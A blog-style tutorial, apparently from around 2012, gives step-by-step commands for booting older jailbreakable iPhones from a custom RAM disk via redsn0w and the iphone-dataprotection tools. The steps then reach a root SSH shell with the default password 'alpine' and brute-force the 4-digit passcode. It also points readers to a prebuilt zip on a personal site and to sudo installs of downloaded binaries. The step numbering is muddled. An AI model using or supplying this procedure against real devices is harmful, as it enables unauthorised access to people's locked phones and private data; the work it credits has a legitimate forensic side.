Hacking the iPhone and breaking PINs and Passcodes

iOS devices can be booted with their own kernel and micro operating systems instead of approved Apple firmware. When iOS devices are loaded with a micro kernel you can run attacks such as bypassing the passcode on iOS devices, decrypting passwords, copying file systems, examining emails and texts messages and much more.

A special shout out to Tom Bedwell, a great technical strategist for allowing me to bounce my ideas and do some sanity checking. Follow Tom on Twitter: twitter.com/tb_well

Note:

If you run in to trouble when creating a RAM DISK due to unique OS configurations and code versions, don’t despair.

The following guide describes in detail how to create a RAM DISK, however it may not function precisely as a step-by-step instruction set, since each system is unique and requires some level of customization.

 

If you want to take the easy way

Download: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip 

-       and then complete step 11 then proceed to step 20.

 

Now let the real fun begin

IMPORTANT: Watch the word wrap. Many commands are single line commands and may be wrapped on multiple lines.

 

Step 1: Uninstall file system readers

If you have a system tool such as MacFuse or Tuxera, you will want to uninstall the program before you get started and reboot your machine.

Step 2: Install Xcode from the Mac App Store

Step 3: Download and install Xcode Command Line Tools:

 

1. Download Xcode from the Apple App Store

2. Launch Xcode and go to preferences

3. Install Xcode Command Line tools and Simulators

 

Step 4: Open the Terminal App.

Make sure you are in your home directory. In my case the home directory is /Users/alakhani

Step 5: install Ldid and required dependencies.

ldid is used to self-sign pieces for the code that we will upload to the iPhone

1. curl -O http://networkpx.googlecode.com/files/ldid

2. chmod +x ldid
3. sudo mv ldid /usr/bin/

 

Step 6: install Fuse

 

  1. You will first need to verify what the latest version of Fuse is, which can be done by going to http://osxfuse.github.com. You can see at the time of writing the latest version is 2.5.4. You do not need to download from here. We will download it via command line.

 

Fuse is an extension that allows Mac OS X to read non native file systems.

2. curl -O -Lhttps://github.com/downloads/osxfuse/osxfuse/OSXFUSE-2.5.4.dmg

3. hdiutil mount OSXFUSE-2.5.4.dmg

4. sudo installer -pkg “/Volumes/FUSE for OS X/Install OSXFUSE 2.5.pkg” -target /

 

 

You will see this once it installs:

5. sudo hdiutil eject “/Volumes/FUSE for OS X/”

 

 

 

 

Step 6: Download and install Python packages

 

Mac OS X 8.X comes preloaded with Python. However, we will still need to add some Python packages.

 

  1. sudo ARCHFLAGS=’-arch i386 -arch x86_64′ easy_install pycrypto2. sudo easy_install M2crypto construct progressbar

 

2. sudo easy_install M2crypto construct progressbar

 

Step 7: Download and install Mercurial

 

  1. Go to http://mercurial.selenic.com/
  2. Download and install Mercurial, 2.4 or later

Step 8: Download iPhone Data Protection Utilities

  1. hg clone https://code.google.com/p/iphone-dataprotection/(note if the command does not work you did not install Mercurial).

 

2. cd iphone-dataprotection

 

Step 9: Create script to encrypt and decrypt ramdisk kernal

 

Compile img3fs.c. This script is used to encrypt and decrypt Ramdisk and kernel patch.

I ran into some issues and had to change the compiler path. You can change this by editing the makefile in the img3fs folder.

1.  make -C img3fs/

 

Step 10: Download Redsn0w

 

Verify the latest version of Redsn0w. At the time of writing 0.9.15b3 is the latest version.

You can verify the latest version by going to: http://www.iphonehacks.com/download-redsn0w  – No reason to download it here. We will retrieve it directly to our working directory using the command line

3. curl -O -L https://sites.google.com/a/iphonedev.com/files/home/redsn0w_mac_0.9.15b3.zip

4. unzip redsn0w_mac_0.9.15b3.zip

 

  1. You will now copy the encryption keys

 

Step 11: Download iOS firmware

 

You will need a copy of iOS firmware for your device that is jaill breakable. You can go to http://www.getios.com to grab a copy of iOS firmware for your device.

 

NOTE: Given this requires a device and iOS firmware that is jail breakable, it does not work on the iPhone 5 at the time of writing.

 

 

Step 12: Copy iOS firmware from your downloads folder (or wherever you saved it) to your iPhone Data Protection Folder

 

Step 13: Create a patch kernel and shell script

python python_scripts/kernel_patcher.py iPhone3,3_5.1.1_9B206_Restore.ipsw

 

Step 15 : Create RAM DISK

sh ./make_ramdisk_n92ap.sh

Step 16 : iOS SDK Not Found

The links for iOS SDKs have been changed.

  1. Find where your iOS SDK is by typing the following command: xcode-select -print-path
  2. edit the make_ramdisk_n92ap.sh file

Change the following:

(Old)

“/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS$VER.sdk/System/Library/Frameworks/IOKit.framework/IOKit” ];

 

(New) Change it to the relevant path of your SDK

 

Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS6.0.sdk/System/Library/Frameworks/IOKit.framework/IOKit” ];   

(Old)

./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg

(New)  – Change it to the relevant ipsw you downloaded

./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg

 

Step 17 : Change Symbolic Link

Use symbolic link: sudo ln -s /Applications/Xcode.App/Contents/Developer /

Step 18 : Run script again

Run the make command again: sudo sh ./make_ramdisk_n92ap.sh

(Important: make sure you run it as sudo)

Note: If you skipped the earlier steps, or could not get step 18 to build a RAM Disk you can download a pre-created version of the RAM DISK. The pre-created version of the file can be found here: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip

 

After you download the pre-created RAM disk you can move to step 20.

You will also need to download a copy of a jail breakable iOS described in step 11.

Step 20 : Load RAM Disk

Make sure device is plugged in.

Make sure device is turned off.

Device needs to be plugged in BEFORE it is turned off.

 

Run the following command:

 

sudo ./redsn0w_mac_0.9.15b3/redsn0w.app/Contents/MacOS/redsn0w -i iPhone3,3_5.1.1_9B206_Restore.ipsw -r myramdisk_n90ap.dmg -k kernelcache.release.n90.patched

(note: You will need to change the iPhone firmware name to the one appropriate for your device).

You will also need to change to the correct version and path of redsn0w.

 

Step 21 : Following On Screen Instructions

 

 

Lastly, you will want to wait a minute until you see the OK on the screen.

 

Step 22 : USB MUX

Next we will need to establish a connection from our computer to our phone. We will establish a reverse SSH connection thru our USB cable.

Essentially, this is the same way iTunes communicates with the iPhone over USB. The process is called USB Multiplexing. It establishes a TCP connection over USB using SSL.

From your terminal screen on the Mac run the following command:

(note: open a new terminal tab)

python usbmuxd-python-client/tcprelay.py -t 22:2222 1999:1999

Step 23: SSH into the phone

Open a new terminal tab

SSH into the phone

Type the following command:

ssh -p 2222 root@localhost

password: alpine

Step 24 : Following On Screen Instructions

Open a New terminal tab on your Mac:

Type the following command:

python python_scripts/demo_bruteforce.py

(when you are prompted to provide the device’s passcode – leave blank)

Run the brute force password cracker. It will pre-configured to brute force any 4-digit simple password. It will make approximately 25 minutes to run thru all possible combination. You can modify the script to crack more complex passcodes and PINs.

In our case the passcode was “0111”

The script by default will brute force 4-digit passcodes. It will start of with “000″ then move onto “0001, 0002, 0003…” and so on. It takes approx. 25 minutes to cycle thru all 10,000 combinations and reach 9999.

Step 25 : reboot

Go to your SSH tab of your phone

Issue the command: reboot

 

 

References:

I wanted to thank Satish at http://resources.infosecinstitute.com/iphone-forensics/ for his post and work he did on the same topic. In the above article you will find my modifications since I was running OS X 10.8.2 and a newer version of Xcode.

However, I encourage everyone to check out http://resources.infosecinstitute.com/iphone-forensics/ and read the instructions and watch Satish’s YouTube video at http://www.youtube.com/watch?feature=player_embedded&v=hp-Mrw4yo9o